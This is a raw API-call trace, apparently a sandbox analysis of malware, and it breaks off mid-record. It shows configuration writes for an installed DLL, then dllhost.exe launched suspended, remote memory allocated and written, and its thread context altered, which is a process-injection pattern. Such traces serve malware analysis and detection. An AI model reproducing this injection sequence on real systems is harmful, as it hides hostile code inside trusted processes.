lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.328] strlen (_Str="core") returned 0x4 [0089.333] strlen (_Str="install_svc") returned 0xb [0089.333] strlen (_Str="core") returned 0x4 [0089.336] strlen (_Str="install_svc") returned 0xb [0089.336] strlen (_Str="install_svc") returned 0xb [0089.336] GetCurrentThreadId () returned 0xac0 [0089.342] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.366] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.397] strlen (_Str="core") returned 0x4 [0089.398] strlen (_Str="core.installed_file") returned 0x13 [0089.398] strlen (_Str="core.installed_file") returned 0x13 [0089.398] strlen (_Str="core.installed_file") returned 0x13 [0089.398] strlen (_Str="core.installed_file") returned 0x13 [0089.398] strlen (_Str="core.installed_file") returned 0x13 [0089.398] strlen (_Str="core.installed_file") returned 0x13 [0089.398] strlen (_Str="core.installed_file") returned 0x13 [0089.398] strlen (_Str="core.installed_file") returned 0x13 [0089.398] strlen (_Str="core.installed_file") returned 0x13 [0089.398] strlen (_Str="core.installed_file") returned 0x13 [0089.398] strlen (_Str="core.installed_file") returned 0x13 [0089.398] strlen (_Str="core.installed_file") returned 0x13 [0089.398] strlen (_Str="core.installed_file") returned 0x13 [0089.398] strlen (_Str="C:\\ProgramData\\252e9d6f-46f0-4cf5-8686-f2a673c579a2\\af77746e-8a65-4302-8042-f6017918c669.dll") returned 0x5c [0089.398] strcmp (_Str1="core.installed_file", _Str2="core.crash_handler") returned 1 [0089.398] strcmp (_Str1="core.installed_file", _Str2="core.installed_file") returned 0 [0089.398] strlen (_Str="C:\\ProgramData\\252e9d6f-46f0-4cf5-8686-f2a673c579a2\\af77746e-8a65-4302-8042-f6017918c669.dll") returned 0x5c [0089.398] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2627130, cbMultiByte=92, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0089.398] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2627130, cbMultiByte=92, lpWideCharStr=0x2620b18, cchWideChar=92 | out: lpWideCharStr="C:\\ProgramData\\252e9d6f-46f0-4cf5-8686-f2a673c579a2\\af77746e-8a65-4302-8042-f6017918c669.dll") returned 92 [0089.398] strcmp (_Str1="core.installed_file", _Str2="core.servers") returned -1 [0089.398] strcmp (_Str1="core.installed_file", _Str2="core.cert_fp") returned 1 [0089.398] strlen (_Str="core.installed_file") returned 0x13 [0089.398] strlen (_Str="C:\\ProgramData\\252e9d6f-46f0-4cf5-8686-f2a673c579a2\\af77746e-8a65-4302-8042-f6017918c669.dll") returned 0x5c [0089.398] strlen (_Str="core") returned 0x4 [0089.399] strlen (_Str="core") returned 0x4 [0089.399] strlen (_Str="core") returned 0x4 [0089.399] GetCurrentThreadId () returned 0xac0 [0089.402] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat"), bFailIfExists=0) returned 1 [0089.404] strlen (_Str="install_svc") returned 0xb [0089.404] strlen (_Str="core") returned 0x4 [0089.404] strlen (_Str="install_svc") returned 0xb [0089.404] strlen (_Str="install_svc") returned 0xb [0089.404] GetCurrentThreadId () returned 0xac0 [0089.404] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.404] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.404] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.406] strlen (_Str="core") returned 0x4 [0089.406] _snprintf (in: _Dest=0x516fd30, _Count=0x3f, _Format="%d" | out: _Dest="1") returned 1 [0089.406] strlen (_Str="core.installed") returned 0xe [0089.406] strlen (_Str="core.installed") returned 0xe [0089.406] strlen (_Str="core.installed") returned 0xe [0089.406] strlen (_Str="core.installed") returned 0xe [0089.406] strlen (_Str="core.installed") returned 0xe [0089.406] strlen (_Str="core.installed") returned 0xe [0089.406] strlen (_Str="core.installed") returned 0xe [0089.406] strlen (_Str="core.installed") returned 0xe [0089.406] strlen (_Str="core.installed") returned 0xe [0089.406] strlen (_Str="core.installed") returned 0xe [0089.406] strlen (_Str="core.installed") returned 0xe [0089.406] strlen (_Str="core.installed") returned 0xe [0089.406] strlen (_Str="core.installed") returned 0xe [0089.406] strlen (_Str="core.installed") returned 0xe [0089.406] strlen (_Str="1") returned 0x1 [0089.406] strcmp (_Str1="core.installed", _Str2="core.crash_handler") returned 1 [0089.406] strcmp (_Str1="core.installed", _Str2="core.installed_file") returned -1 [0089.406] strcmp (_Str1="core.installed", _Str2="core.restart_cmd") returned -1 [0089.406] strcmp (_Str1="core.installed", _Str2="core.servers") returned -1 [0089.406] strcmp (_Str1="core.installed", _Str2="core.cert_fp") returned 1 [0089.406] strlen (_Str="core.installed") returned 0xe [0089.406] strlen (_Str="1") returned 0x1 [0089.406] strlen (_Str="core") returned 0x4 [0089.406] strlen (_Str="core") returned 0x4 [0089.407] strlen (_Str="core") returned 0x4 [0089.407] GetCurrentThreadId () returned 0xac0 [0089.409] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat"), bFailIfExists=0) returned 1 [0089.412] strlen (_Str="install_svc") returned 0xb [0089.412] strlen (_Str="core") returned 0x4 [0089.412] strlen (_Str="install_svc") returned 0xb [0089.412] strlen (_Str="install_svc") returned 0xb [0089.412] GetCurrentThreadId () returned 0xac0 [0089.412] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.412] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.413] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.413] strlen (_Str="core") returned 0x4 [0089.414] _snprintf (in: _Dest=0x516fd30, _Count=0x3f, _Format="%d" | out: _Dest="1510082733") returned 10 [0089.414] strlen (_Str="core.install_time") returned 0x11 [0089.414] strlen (_Str="core.install_time") returned 0x11 [0089.414] strlen (_Str="core.install_time") returned 0x11 [0089.414] strlen (_Str="core.install_time") returned 0x11 [0089.414] strlen (_Str="core.install_time") returned 0x11 [0089.414] strlen (_Str="core.install_time") returned 0x11 [0089.414] strlen (_Str="core.install_time") returned 0x11 [0089.414] strlen (_Str="core.install_time") returned 0x11 [0089.414] strlen (_Str="core.install_time") returned 0x11 [0089.414] strlen (_Str="core.install_time") returned 0x11 [0089.414] strlen (_Str="core.install_time") returned 0x11 [0089.414] strlen (_Str="core.install_time") returned 0x11 [0089.414] strlen (_Str="core.install_time") returned 0x11 [0089.414] strlen (_Str="core.install_time") returned 0x11 [0089.414] strlen (_Str="core.install_time") returned 0x11 [0089.414] strlen (_Str="1510082733") returned 0xa [0089.414] strcmp (_Str1="core.install_time", _Str2="core.crash_handler") returned 1 [0089.414] strcmp (_Str1="core.install_time", _Str2="core.installed_file") returned -1 [0089.414] strcmp (_Str1="core.install_time", _Str2="core.restart_cmd") returned -1 [0089.414] strcmp (_Str1="core.install_time", _Str2="core.servers") returned -1 [0089.414] strcmp (_Str1="core.install_time", _Str2="core.cert_fp") returned 1 [0089.414] strlen (_Str="core.install_time") returned 0x11 [0089.414] strlen (_Str="1510082733") returned 0xa [0089.414] strlen (_Str="core") returned 0x4 [0089.415] strlen (_Str="core") returned 0x4 [0089.415] strlen (_Str="core") returned 0x4 [0089.418] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat"), bFailIfExists=0) returned 1 [0089.420] strlen (_Str="install_svc") returned 0xb [0089.420] strlen (_Str="core") returned 0x4 [0089.420] strlen (_Str="install_svc") returned 0xb [0089.420] strlen (_Str="install_svc") returned 0xb [0089.420] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.420] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.420] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.421] strlen (_Str="core") returned 0x4 [0089.422] _snprintf (in: _Dest=0x516fd30, _Count=0x3f, _Format="%d" | out: _Dest="1") returned 1 [0089.422] strlen (_Str="core.crash_handler") returned 0x12 [0089.422] strlen (_Str="core.crash_handler") returned 0x12 [0089.422] strlen (_Str="core.crash_handler") returned 0x12 [0089.422] strlen (_Str="core.crash_handler") returned 0x12 [0089.422] strlen (_Str="core.crash_handler") returned 0x12 [0089.422] strlen (_Str="core.crash_handler") returned 0x12 [0089.422] strlen (_Str="core.crash_handler") returned 0x12 [0089.422] strlen (_Str="core.crash_handler") returned 0x12 [0089.422] strlen (_Str="core.crash_handler") returned 0x12 [0089.422] strlen (_Str="core.crash_handler") returned 0x12 [0089.422] strlen (_Str="core.crash_handler") returned 0x12 [0089.422] strlen (_Str="core.crash_handler") returned 0x12 [0089.422] strlen (_Str="core.crash_handler") returned 0x12 [0089.422] strlen (_Str="core.crash_handler") returned 0x12 [0089.422] strlen (_Str="core.crash_handler") returned 0x12 [0089.422] strlen (_Str="core.crash_handler") returned 0x12 [0089.422] strlen (_Str="1") returned 0x1 [0089.422] strcmp (_Str1="core.crash_handler", _Str2="core.crash_handler") returned 0 [0089.422] atoi (_Str="1") returned 1 [0089.422] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.422] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.422] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.423] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.423] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.423] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.423] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.423] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.423] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.423] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.423] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.423] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.423] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.423] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.423] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.423] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.423] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.426] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat"), bFailIfExists=0) returned 1 [0089.428] PathAppendW (in: pszPath="C:\\Windows\\system32", pMore="dllhost.exe" | out: pszPath="C:\\Windows\\system32\\dllhost.exe") returned 1 [0089.428] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\dllhost.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x516f818*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x516f7f0 | out: lpCommandLine=0x0, lpProcessInformation=0x516f7f0*(hProcess=0x2f8, hThread=0x2f4, dwProcessId=0x474, dwThreadId=0x5d4)) returned 1 [0089.435] GetCurrentProcessId () returned 0xaa8 [0089.439] VirtualAllocEx (hProcess=0x2f8, lpAddress=0x0, dwSize=0x186, flAllocationType=0x3000, flProtect=0x4) returned 0x60000 [0089.457] WriteProcessMemory (in: hProcess=0x2f8, lpBaseAddress=0x60000, lpBuffer=0x26388c0*, nSize=0x186, lpNumberOfBytesWritten=0x516f4dc | out: lpBuffer=0x26388c0*, lpNumberOfBytesWritten=0x516f4dc*=0x186) returned 1 [0089.457] VirtualAllocEx (hProcess=0x2f8, lpAddress=0x0, dwSize=0x76000, flAllocationType=0x3000, flProtect=0x40) returned 0x70000 [0089.457] WriteProcessMemory (in: hProcess=0x2f8, lpBaseAddress=0x70000, lpBuffer=0x5c90000*, nSize=0x76000, lpNumberOfBytesWritten=0x516f4dc | out: lpBuffer=0x5c90000*, lpNumberOfBytesWritten=0x516f4dc*=0x76000) returned 1 [0089.463] GetThreadContext (in: hThread=0x2f4, lpContext=0x516f4dc | out: lpContext=0x516f4dc*(ContextFlags=0x1003f, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x27f, FloatSave.StatusWord=0x0, FloatSave.TagWord=0xffff, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0xab1609, Ebp=0x0, Eip=0x76f801c4, SegCs=0x23, EFlags=0x202, Esp=0x1afa60, SegSs=0x2b, ExtendedRegisters=([0]=0x7f, [1]=0x2, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x80, [25]=0x1f, [26]=0x0, [27]=0x0, [28]=0xff, [29]=0xff, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0089.464] SetThreadContext (hThread=0x2f4, lpContext=0x516f4dc*(ContextFlags=0x1003f, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x27f, FloatSave.StatusWord=0x0, FloatSave.TagWord=0xffff, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x87abf, Ebp=0x0, Eip=0x76f801c4, SegCs=0x23, EFlags=0x202, Esp=0x1afa60, SegSs=0x2b, 